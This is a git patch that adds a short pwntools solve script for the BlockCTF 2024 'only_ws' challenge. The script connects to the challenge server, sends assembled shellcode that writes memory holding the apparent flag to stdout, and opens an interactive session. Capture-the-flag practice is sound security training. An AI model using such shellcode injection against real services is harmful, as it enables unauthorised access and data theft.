From 85fea9783671a418970d94a4ed38d9d3f261b9c6 Mon Sep 17 00:00:00 2001 From: jc Date: Fri, 15 Nov 2024 23:48:04 +0300 Subject: [PATCH] solve script --- blockctf_2024/only_ws/a.py | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 blockctf_2024/only_ws/a.py diff --git a/blockctf_2024/only_ws/a.py b/blockctf_2024/only_ws/a.py new file mode 100644 index 0000000..4727dd6 --- /dev/null +++ b/blockctf_2024/only_ws/a.py @@ -0,0 +1,24 @@ +#!/usr/bin/python3 + +from pwn import * + +context.binary = target = ELF("./only_ws", checksec=False) +# r = process() +r = remote("54.85.45.101", 8005) + +# funcs +s = lambda a: r.sendline(a) + +# shellcode +sc = """ +mov rax, 1 +mov rdi, 1 +mov rsi, 0x4040a0 +xor rdx, rdx +add dl, 0xff +syscall +""" +sc = asm(sc) +s(sc) + +r.interactive() \ No newline at end of file